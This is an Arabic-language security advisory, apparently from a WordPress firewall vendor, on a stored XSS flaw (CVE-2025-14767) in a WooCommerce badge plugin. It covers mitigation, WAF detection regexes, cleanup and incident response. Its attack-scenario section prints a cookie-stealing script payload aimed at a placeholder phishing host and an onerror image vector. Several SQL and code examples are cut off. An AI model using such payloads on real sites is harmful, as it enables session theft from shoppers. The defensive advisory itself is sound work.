
| اسم البرنامج الإضافي | إدارة شارات WPC لـ WooCommerce |
|---|---|
| نوع الضعف | XSS |
| رقم CVE | CVE-2025-14767 |
| الاستعجال | قليل |
| تاريخ نشر CVE | 2026-05-13 |
| رابط المصدر | CVE-2025-14767 |
إدارة شارات WPC (<= 3.1.6) XSS مخزنة — ما يجب على مالكي مواقع WooCommerce القيام به الآن
مؤلف: فريق أمان WP‑Firewall
تاريخ: 2026-05-13
العلامات: WordPress، WooCommerce، الأمان، XSS، WAF، الثغرة
ملخص: ثغرة XSS مخزنة تؤثر على إدارة شارات WPC لـ WooCommerce (الإصدارات <= 3.1.6، CVE‑2025‑14767) تسمح لمستخدم مصدق لديه دور مدير المتجر بتخزين نص برمجي خبيث يتم تنفيذه لاحقًا في متصفحات الزوار. يشرح هذا المنشور المخاطر، وسيناريوهات الاستغلال المحتملة، وتقنيات الكشف، والتخفيفات الفورية (بما في ذلك تصحيح WAF الافتراضي)، وخطوات تعزيز الأمان على المدى الطويل — من منظور جدار حماية WordPress ومزود الأمان.
لماذا هذا مهم (نسخة قصيرة)
يمكن أن تسمح ثغرة XSS المخزنة في مكون إضافي يدير الشارات للمنتجات للمهاجم بوضع JavaScript على صفحات المنتجات (أو شاشات الإدارة) حيث يقوم الزوار — بما في ذلك العملاء أو المسؤولين — بتنفيذه. على الرغم من أن الثغرة تتطلب مدير متجر مصدق وتُصنف على أنها منخفضة/متوسطة (CVSS 5.9)، إلا أن التأثير في العالم الحقيقي يمكن أن يكون ذا مغزى:
- إعادة توجيه العملاء إلى صفحات تصيد
- حقن عمالة العملات المشفرة أو محتوى الإعلانات
- سرقة ملفات تعريف الارتباط للجلسة، وبيانات نموذج الدفع أو رموز المصادقة
- استغلال واجهة المستخدم الإدارية لزيادة الامتيازات أو نشر أبواب خلفية أخرى
نظرًا لأن هذه الثغرة تم إصلاحها في الإصدار 3.1.7، فإن أفضل إجراء هو تحديث المكون الإضافي على الفور. إذا لم تتمكن من التحديث على الفور، فاتبع التخفيفات أدناه.
تفاصيل الثغرة (ما تم الإبلاغ عنه)
- المكون الإضافي المتأثر: إدارة شارات WPC لـ WooCommerce
- الإصدارات المعرضة للخطر: <= 3.1.6
- تم تصحيحها في: 3.1.7
- نوع الثغرة: البرمجة النصية عبر المواقع المخزنة (XSS)
- الامتياز المطلوب: مدير المتجر (موثق)
- CVE: CVE‑2025‑14767
- الاستغلال: يتطلب وجود مدير متجر لتزويد إدخال خبيث يتم الاحتفاظ به ويتم عرضه لاحقًا على صفحة حيث يتم تنفيذه في متصفح مستخدم آخر
- متطلبات تفاعل المستخدم: نعم — يحتاج المهاجم إلى تخزين حمولة ويجب على زوار الموقع أو المستخدمين ذوي الامتيازات تحميل الصفحة حيث يتم عرض الحمولة
نموذج التهديد — من يمكن مهاجمته وكيف
- مهاجم لديه حساب مدير متجر:
- العديد من المتاجر تعهد بإدارة المنتجات/الأعمال إلى موظفين أو مقاولين أو وكالات خارجية. إذا تم اختراق أي من تلك الحسابات أو كانت خبيثة، يمكنهم إضافة أو تعديل الشارات.
- يتم تسليم الحمولة المخزنة إلى:
- صفحات المنتجات العامة (يتم تنفيذها بواسطة أي زائر)
- قوائم المنتجات الإدارية (يتم تنفيذها عندما يقوم مسؤول آخر أو مدير متجر بمشاهدتها)
- التأثيرات الناتجة:
- إعادة توجيه مستمرة / تشويه
- سرقة جلسة العميل (سرقة الكوكيز، سرقة الرموز)
- سكربتات خبيثة تغير الأسعار أو تفاصيل الدفع (نادراً ولكن ممكن)
- حقن تصيد، تزوير طلب عبر المواقع بالتزامن مع تكوينات خاطئة أخرى
- الاستمرارية الخفية: المهاجم يخفي كود الباب الخلفي في جداول الميتا أو الخيارات
بينما إذن مدير المتجر ليس أعلى مستوى من الامتيازات، فإن المتاجر غالباً ما تعطي هذا الوصول للأشخاص غير التقنيين - لذا فإن المتجه حقيقي.
إجراءات فورية (قائمة مراجعة خطوة بخطوة يمكنك القيام بها في الـ 60 دقيقة القادمة)
- تحديث الإضافة إلى الإصدار 3.1.7 (أو أحدث)
- هذا هو الإصلاح النهائي. إذا كنت تستطيع التحديث، افعل ذلك الآن؛ اختبر على بيئة الاختبار إذا كان ذلك ممكنًا.
- إذا لم تتمكن من التحديث فورًا:
- قم بإزالة أو تعطيل الإضافة مؤقتًا.
- تقييد حسابات مدير المتجر (تعطيل أو تغيير الأدوار للمستخدمين المشتبه بهم).
- تطبيق تصحيح افتراضي لجدار الحماية (انظر قواعد WAF أدناه) لحظر أنماط الهجوم.
- تدوير بيانات الاعتماد:
- فرض إعادة تعيين كلمة المرور لمستخدمي مدير المتجر.
- إلغاء وإعادة إصدار مفاتيح API، مفاتيح بوابة الدفع إذا كنت تشك في الاختراق.
- مسح السكربتات المحقونة:
- البحث في قاعدة البيانات عن علامات السكربت الشائعة (أمثلة SQL أدناه).
- المراقبة والحجر:
- تحقق من السجلات للأنشطة المشبوهة من حسابات ومدير المتجر وعناوين IP.
- حظر أو حجر عناوين IP وعوامل المستخدم المشبوهة.
إذا كنت تستخدم WP‑Firewall، تأكد من أن موقعك يحتوي على أحدث تحديثات التوقيع، وقم بتمكين التصحيح الافتراضي حتى يتم فرض الحماية قصيرة المدى أثناء تحديث المكونات الإضافية وتدقيق المستخدمين.
كيفية اكتشاف ما إذا كان موقعك متأثرًا
ابدأ بالأشياء الواضحة: ابحث عن علامات السكربت والسمات المشبوهة في المواقع التي يتم استغلالها عادةً:
- أوصاف المنتجات (wp_posts.post_content)
- بيانات المنشور (wp_postmeta.meta_value) - العديد من مكونات الشارة الإضافية تخزن التكوين في بيانات المنشور
- جدول الخيارات (wp_options.option_value)
- أي جداول مكونات إضافية تستخدمها مكون الشارة
استعلامات SQL (تشغيلها من phpMyAdmin، Adminer، أو عبر wp‑cli db query):
-- ابحث عن علامات في المنشورات;
استخدم WP‑CLI لتدقيق المستخدمين:
# قائمة المستخدمين الذين لديهم دور مدير المتجر"
قم بفحص الملفات والسمات:
- قم بتشغيل فحص للبرامج الضارة يتحقق من وجود JS غير متوقع تم إدخاله في ملفات السمات، أو مجلدات المكونات الإضافية، أو دليل التحميلات.
- ابحث عن الملفات التي تم تغييرها مؤخرًا:
# على الخادم، في دليل WordPress الخاص بك
تحقق من سجلات الوصول لطلبات POST إلى صفحات الإدارة أو استدعاءات admin‑ajax المشبوهة من حسابات مدير المتجر أو عناوين IP الخارجية.
كيف يمكن للمهاجم استغلال هذه الثغرة المحددة - سيناريوهات عملية
- السيناريو أ: مقاول خبيث لديه وصول كمدير متجر يضيف علامة شارة تحتوي على
<script>document.location='https://phish.example/?c=' + document.cookie</script>ويتم تنفيذ البرنامج النصي للزوار على صفحة المنتج. قد يتم سرقة جلسات العملاء أو ملفات تعريف الارتباط للتتبع. - السيناريو ب: يقوم المهاجم بوضع الحمولة في عنوان الشارة الذي يحتوي على
عند حدوث خطأمعالجات (مثل،,<img src="x" onerror="...">)، مما يجعل الكشف عبر الفلاتر الساذجة أكثر صعوبة. - السيناريو ج: يستهدف البرنامج النصي المخزن المسؤولين الذين يشاهدون صفحات المنتجات في الإدارة عن طريق تنفيذ كود لإنشاء مستخدم إداري جديد أو لتعديل ملفات المكونات الإضافية / القوالب (إذا تم دمجه مع تكوينات خاطئة أخرى).
نظرًا لأن XSS المخزن يستمر في قاعدة البيانات، يمكن للمهاجم العودة بعد أسابيع - أو استخدام برامج نصية آلية تقوم بتشغيل الكود عبر العديد من الصفحات.
إرشادات WAF / التصحيح الافتراضي (ما يجب تطبيقه الآن)
إذا كنت تدير جدار حماية لتطبيق الويب (WAF) - أو تستخدم WAF مُدار بواسطة WP‑Firewall - يجب عليك نشر قواعد التصحيح الافتراضي لحظر الحمولات المحتملة للاستغلال على الفور. يوفر التصحيح الافتراضي الوقت لتحديث وتدقيق الحسابات.
أنماط الكشف العامة للحظر:
- طلبات POST أو PUT التي تتضمن
<scriptأوجافا سكريبت:في الحقول المقدمة إلى صفحات الإدارة (wp-admin/post.php، admin‑ajax.php، إلخ.) - الطلبات التي تتضمن معالجات أحداث مشبوهة:
عند حدوث خطأ=,تحميل=,عند تمرير الماوس فوق=,عند النقر= - المدخلات مع
<img+عند حدوث خطأ=تسلسلات - حمولات طويلة تتضمن تسلسلات نصية مشفرة مثل
\x3Cscriptأو<script
أمثلة على قواعد ModSecurity (نمط عام - اختبر قبل النشر):
# حظر حقول النموذج التي تحتوي على علامات نصية أو معالجات أحداث (قم بضبطها على موقعك)"
إذا كنت تستخدم WAF NGINX أو محرك قواعد مخصص، قم بتطبيق حظر قائم على regex على أجسام الطلبات لإسقاط الطلبات التي تحتوي على حمولات تتضمن <script أو معالجات الأحداث. ملاحظة: كن حذرًا لتجنب الإيجابيات الكاذبة - قم بإدراج التكاملات الموثوقة في القائمة البيضاء (بعض أوصاف المنتجات تتضمن بشكل شرعي iframes أو محتوى مضمن).
مثال على التصحيح الافتراضي لـ WP‑Firewall (مفاهيمي):
- أضف قاعدة لحظر طلبات POST إلى صفحات الإدارة التي تحتوي على
<scriptأوعند حدوث خطأ - أضف قاعدة لتنظيف مخرجات نقاط عرض الشارة عند العرض (إزالة
6.العلامات) - تحديد معدل أو حظر العمليات الجماعية التي يقوم بها حسابات مدير المتجر من عناوين IP غير المألوفة
إذا كنت تستخدم WP‑Firewall، قم بتمكين طبقة التصحيح الافتراضية لدينا - يمكن أن تحيد محاولات الاستغلال في الوقت الحقيقي أثناء تحديث المكون الإضافي وتدقيق المستخدمين.
أنماط تعبير WAF القصيرة (للمهندسين)
- حظر ظهور علامة السكربت (غير حساسة لحالة الأحرف، مفككة URL):
(?i)(%3Cscript|<script)
- حظر سمات معالجات الأحداث:
(?i)(onerror\s*=|onload\s*=|onclick\s*=|onmouseover\s*=)
- حظر استخدام URI javascript:
(?i)javascript\s*:
اختبر هذه الأنماط على نسخة تجريبية وتأكد من أنها لا تحظر المحتوى الشرعي (على سبيل المثال، بعض منشئي الصفحات يتضمنون JS مضمن أو تضمينات - قم بالتقييم لكل موقع).
كيفية تنظيف مخرجات المكون الإضافي في WordPress (موصى به للمطورين)
إذا كنت تدير الموقع أو كان هناك مطور متاح، فإن إضافة التنظيف عند عرض محتوى الشارة يقلل من المخاطر حتى لو أثبت كود المكون الإضافي لاحقًا أنه ضعيف. استخدم دوال الهروب في WordPress بشكل مناسب.
مثال: إذا كان المكون الإضافي يخرج تسمية الشارة، قم بتغيير المخرجات لاستخدام الهروب:
// خطير: echo $badge_label; <strong> أو <em>, استخدم مجموعة KSES صارمة:;
إذا كان المكون الإضافي يوفر فلاتر، قم بالربط بها وتنظيفها:
add_filter( 'wpc_badge_render_content', function( $content ) {;
إذا كنت لا تعرف أسماء الفلاتر، فكر في لف مخرجات المكون الإضافي بـ ob_start() و ob_get_clean() لتنظيف قبل الإرجاع (تخفيف مؤقت أثناء تحديث المكون الإضافي).
تنظيف: كيفية العثور على وإزالة السكربتات الخبيثة المدخلة في قاعدة البيانات
- قم بتصدير أو تفريغ قاعدة البيانات قبل إجراء التغييرات (احتفظ بنسخة للتحليل الجنائي).
- استخدم SQL مستهدف للعثور على سلاسل مشبوهة، ثم افحص النتائج قبل الحذف.
الاستعلامات الشائعة:
-- إرجاع الصفوف التي تحتوي على ظهور ;
إذا أكدت وجود محتوى ضار:
- قم بعمل نسخة من الصف (الصفوف) إلى موقع آمن (لأغراض التحقيق)
- قم بإزالة علامات السكربت الضارة باستخدام UPDATE محكم:
UPDATE wp_postmeta;
نهج أفضل: تحديث القيم باستخدام دالة مطهرة عبر PHP حتى لا تستخدم wp_kses ولا تتسبب عن غير قصد في تلف البيانات المسلسلة. المصفوفات المسلسلة شائعة؛ استبدال SQL المباشر يعرض لخطر كسر أطوال التسلسل. استخدم WP‑CLI أو سكربت PHP يقوم بفك تسلسل، وتنظيف السلاسل، وإعادة تسلسلها.
مثال على سكربت WP‑CLI (مفاهيمي):
wp eval-file sanitize_badge_meta.php
sanitize_badge_meta.php سيفعل:
- استعلام عن السجلات التي تحتوي على محتوى مشبوه
- فك التسلسل
قيمة_الميتاإذا لزم الأمر - تطهير السلاسل باستخدام
wp_kses - تحديث المحتوى المنظف مرة أخرى
اختبر دائمًا على بيئة staging واحتفظ بنسخة احتياطية من قاعدة البيانات قبل أي استبدال جماعي.
تعزيز المستخدم والدور
نظرًا لأن الثغرة تتطلب صلاحيات مدير المتجر، فإن تعزيز حسابات المستخدمين أمر بالغ الأهمية.
- تدقيق حسابات مدير المتجر:
- استخدم WP‑CLI أو شاشة إدارة المستخدمين لعرضهم.
- تحديد عدد مستخدمي مدير المتجر:
- إزالة حقوق مدير المتجر من المستخدمين الذين لا يحتاجون إليها. ضع في اعتبارك استخدام دور مخصص مع مجموعة قدرات مخفضة.
- استخدم مصادقة أقوى:
- فرض كلمات مرور قوية ومصادقة ثنائية للعوامل لجميع المستخدمين ذوي الامتيازات.
- قيود IP:
- تقييد الوصول الإداري إلى عناوين IP المكتبية إذا كان ذلك ممكنًا (أو السماح عبر VPN).
- إدارة الجلسات:
- تحقق من الجلسات اليتيمة وإنهاء الجلسات النشطة للمستخدمين المشتبه بهم.
مثال WP‑CLI:
# قائمة مديري المتجر
قائمة التحقق من استجابة الحوادث (إذا اكتشفت استغلالًا نشطًا)
- عزل:
- قم بتعطيل المكون الإضافي المعرض للخطر مؤقتًا أو أخذ الموقع offline إذا كان الاستغلال النشط مستمرًا.
- الحفاظ على الأدلة:
- قم بعمل لقطة للخادم (الملفات وقاعدة البيانات) للتحليل الجنائي لاحقًا.
- تنظيف:
- إزالة البرامج النصية الضارة من قاعدة البيانات والملفات (اتبع إرشادات تنظيف قاعدة البيانات أعلاه).
- استعادة الملفات التالفة من نسخة احتياطية نظيفة معروفة إذا لزم الأمر.
- تصحيح وتعزيز:
- تحديث المكون الإضافي إلى 3.1.7+
- تطبيق قواعد WAF وتمكين الحماية المستمرة
- تدوير بيانات الاعتماد وإلغاء أي مفاتيح API مشبوهة
- مراجعة ما بعد الحادث:
- تحديد كيفية تعرض حساب مدير المتجر للاختراق
- تحسين عمليات المستخدمين وأقل امتياز
- تدقيق السجلات والتأكد من عدم بقاء أي استمرارية (وظائف كرون، مستخدمون إداريون غير موثوقين، مكونات مضافة معدلة)
- التواصل:
- إذا تم كشف بيانات العملاء، اتبع القوانين المحلية لإشعار الخرق
- أبلغ مزود الاستضافة الخاص بك إذا لزم الأمر
- شاشة:
- راقب حركة المرور والسجلات لحدوث تكرار لمدة لا تقل عن 90 يومًا
إذا كنت بحاجة إلى مساعدة احترافية، يمكن لمزود استجابة الحوادث أو خدمة الأمان المدارة إجراء تحقيق أعمق وإصلاح.
منع الثغرات المماثلة في المستقبل (توصيات تطوير آمنة)
إذا كنت مطورًا أو توظف مطورين:
- دائمًا قم بتشفير المخرجات، تحقق من المدخلات:
- يستخدم
esc_html(),esc_attr(),wp_kses()حسب الاقتضاء.
- يستخدم
- اتبع مبدأ أقل الامتيازات:
- تأكد من أن قدرات المكونات المضافة مناسبة للمهام ولا تسمح للأدوار ذات المستوى المنخفض بأداء إجراءات عالية المخاطر.
- تجنب تخزين HTML الخام من الأدوار غير الموثوقة:
- إذا كان يجب على المستخدمين النهائيين إضافة HTML، قدم مجموعة فرعية مصفاة عبر KSES و WYSIWYG التي تحد من العلامات.
- مراجعة الكود والاختبار الآلي:
- تضمين التحليل الثابت لمشاكل XSS، إضافة اختبارات وحدات تتحقق من تطهير المدخلات/المخرجات.
- اختبار الأمان:
- إجراء اختبارات اختراق دورية ومسحات آلية على بيئات الاختبار والإنتاج.
مؤلفو المكونات المضافة: كشف الفلاتر وموصلات التطهير الموثقة حتى يتمكن مالكو المواقع من تعزيز المخرجات.
المراقبة والتسجيل - ما يجب الانتباه إليه
- طلبات POST الإدارية التي تحتوي على
<script,عند حدوث خطأ، أوجافا سكريبت:الأنماط - محاولات تسجيل الدخول لحسابات مدير المتجر
- مستخدمون جدد كمدير متجر أو مسؤول تم إنشاؤهم مؤخرًا
- تغييرات الملفات داخل
wp-content/المكونات الإضافيةوwp-content/themes - اتصالات صادرة من الخادم - أحيانًا يتصل الكود الضار بالخارج
- عناوين IP غير المعتادة للإدارة أو وكلاء المستخدم
إعداد تنبيهات لهذه الاحتياجات والاحتفاظ بالسجلات لمدة 90 يومًا على الأقل لدعم التحقيقات في الحوادث.
حول تصنيف CVSS 5.9 - سياق لمسؤولي WordPress
توفر درجات CVSS قاعدة أساسية للمخاطر ولكنها لا تروي القصة كاملةً عن إضافات CMS. تصنيف “5.9” (متوسط) هنا يعكس أن الاستغلال يتطلب مدير متجر مصدق وتفاعل المستخدم، ولكن نظرًا لأن العديد من المتاجر تمنح هذا الدور على نطاق واسع، ولأن XSS المخزنة يمكن أن تكون ناقلًا مستمرًا وخفيًا، يجب أن تأخذ هذه المشكلة على محمل الجد.
تقييم بيئتك الخاصة: إذا كان الوصول إلى مدير المتجر محكمًا، فإن التعرض يكون أقل. إذا كان لدى العديد من الأطراف الثالثة امتيازات مدير المتجر، اعتبر ذلك أمرًا عاجلاً.
خطة تصحيح عملية (الجدول الزمني الموصى به)
- 0–1 ساعة:
- تحديث الإضافة إلى 3.1.7 (أو تعطيل الإضافة)
- تفعيل تصحيح WAF الافتراضي وفحص قاعدة البيانات بحثًا عن علامات نصوص واضحة
- 1–24 ساعة:
- تدقيق المستخدمين وتدوير كلمات المرور لمستخدمي مدير المتجر
- تطهير أي محتوى ضار مؤكد
- 24–72 ساعة:
- إجراء فحص كامل للبرامج الضارة
- تعزيز وصول الإدارة (2FA، قيود IP)
- مراجعة سجلات الخادم وتاريخ الوصول
- 72 ساعة–30 يومًا:
- ضمان النسخ الاحتياطية ومراقبة حركة المرور
- مراجعة أذونات المستخدمين وتنفيذ سياسة الحد الأدنى من الامتيازات
- جدولة مراجعات أمنية دورية
كيف يساعد WP‑Firewall (كيف يتناسب جدار الحماية المدارة ومزود الأمان)
كخدمة جدار حماية وأمان لـ WordPress، يقدم WP‑Firewall:
- WAF مدارة مع توقيعات التهديدات وتصحيح افتراضي يمكن نشره على الفور لتحييد نمط الاستغلال عبر موقعك
- ماسح البرامج الضارة الذي يبحث عن نصوص مشبوهة ومؤشرات على الاختراق في الملفات وقاعدة البيانات
- التحكم في الحظر الآلي وسمعة IP للحد من وصول المهاجمين
- الوصول إلى التصعيد (الخدمات المدارة) للاستجابة الأعمق للحوادث إذا لزم الأمر
إذا كنت بحاجة إلى حماية فورية على المدى القصير، يمكن أن توقف التصحيحات الافتراضية وقواعد WAF محاولات الاستغلال بينما تقوم بتحديث المكون الإضافي وإجراء التدقيقات.
احمِ متجرك على الفور — خطة WP‑Firewall المجانية
إذا كنت تريد طريقة سريعة لإضافة الحماية اليوم، جرب خطتنا الأساسية المجانية. تتضمن حماية جدار ناري مدارة أساسية، عرض نطاق غير محدود من خلال WAF، ماسح ضوئي للبرامج الضارة، وتخفيف لـ OWASP Top 10 — يكفي لوقف العديد من محاولات الاستغلال ومنحك الوقت للتصحيح والتنظيف. اشترك هنا وفعّل الحماية في دقائق:
https://my.wp-firewall.com/buy/wp-firewall-free-plan/
الترقية لاحقًا سهلة إذا كنت تريد إزالة البرامج الضارة تلقائيًا، أو قائمة سوداء/بيضاء لـ IP، أو تصحيحات افتراضية وتقارير أمان شهرية.
التوصيات النهائية — قائمة مراجعة قصيرة لإنهاء هذا المنشور
- قم بتحديث إدارة شارة WPC إلى 3.1.7 أو أحدث على الفور.
- إذا لم تتمكن من التحديث الآن، قم بإلغاء تنشيط المكون الإضافي وطبق تصحيحات WAF الافتراضية لحظر أحمال النصوص البرمجية.
- قم بتدقيق مستخدمي مدير المتجر وفرض مصادقة قوية وأقل امتياز.
- ابحث في قاعدة بياناتك وملفاتك عن النصوص البرمجية المدخلة وقم بتنظيفها بعناية (استخدم WP‑CLI + PHP لتجنب كسر البيانات المتسلسلة).
- قم بتمكين الفحص والمراقبة المستمرة؛ احتفظ بنسخ احتياطية وسجلات.
- اعتبر طبقة أمان مدارة (WAF + فحص البرامج الضارة + تصحيحات افتراضية) لتقليل فترة التعرض.
إذا كنت تريد المساعدة في تنفيذ قواعد WAF، أو فحص النصوص البرمجية المستمرة، أو إجراء تدقيق للأدوار والأذونات، يمكن لمهندسي الأمان لدينا المساعدة. حماية المتاجر من هذه الأنواع من الثغرات هو ما نقوم به كل يوم — والخطوات الأولى (التصحيح، تقييد الأدوار، التصحيحات الافتراضية) بسيطة وفعالة عند اتخاذها بسرعة.
ابقَ آمنًا، تحقق من إصدارات المكونات الإضافية الخاصة بك بانتظام، واحتفظ بالحسابات المميزة مقفلة.
